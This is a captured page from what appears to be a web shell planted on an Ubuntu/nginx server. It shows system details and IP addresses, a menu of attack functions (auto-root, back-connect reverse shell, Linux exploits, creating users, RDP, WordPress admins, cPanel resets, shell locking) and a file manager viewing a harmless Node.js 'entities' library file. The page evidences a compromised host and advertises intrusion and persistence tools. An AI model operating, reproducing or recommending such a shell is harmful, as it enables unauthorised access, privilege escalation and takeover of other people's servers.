Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
entities /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
maps
[ DIR ]
dr-xr-xr-x
decode.d.ts
269
B
-rw-rw-rw-
decode.d.ts.map
290
B
-rw-rw-rw-
decode.js
2.2
KB
-rw-rw-rw-
decode_codepoint.d.ts
114
B
-rw-rw-rw-
decode_codepoint.d.ts.map
192
B
-rw-rw-rw-
decode_codepoint.js
1.13
KB
-rw-rw-rw-
encode.d.ts
1.66
KB
-rw-rw-rw-
encode.d.ts.map
427
B
-rw-rw-rw-
encode.js
4.9
KB
-rw-rw-rw-
index.d.ts
1.32
KB
-rw-rw-rw-
index.d.ts.map
684
B
-rw-rw-rw-
index.js
3.6
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : decode_codepoint.js
"use strict"; var __importDefault = (this && this.__importDefault) || function (mod) { return (mod && mod.__esModule) ? mod : { "default": mod }; }; Object.defineProperty(exports, "__esModule", { value: true }); var decode_json_1 = __importDefault(require("./maps/decode.json")); // Adapted from https://github.com/mathiasbynens/he/blob/master/src/he.js#L94-L119 var fromCodePoint = // eslint-disable-next-line @typescript-eslint/no-unnecessary-condition String.fromCodePoint || function (codePoint) { var output = ""; if (codePoint > 0xffff) { codePoint -= 0x10000; output += String.fromCharCode(((codePoint >>> 10) & 0x3ff) | 0xd800); codePoint = 0xdc00 | (codePoint & 0x3ff); } output += String.fromCharCode(codePoint); return output; }; function decodeCodePoint(codePoint) { if ((codePoint >= 0xd800 && codePoint <= 0xdfff) || codePoint > 0x10ffff) { return "\uFFFD"; } if (codePoint in decode_json_1.default) { codePoint = decode_json_1.default[codePoint]; } return fromCodePoint(codePoint); } exports.default = decodeCodePoint;
Close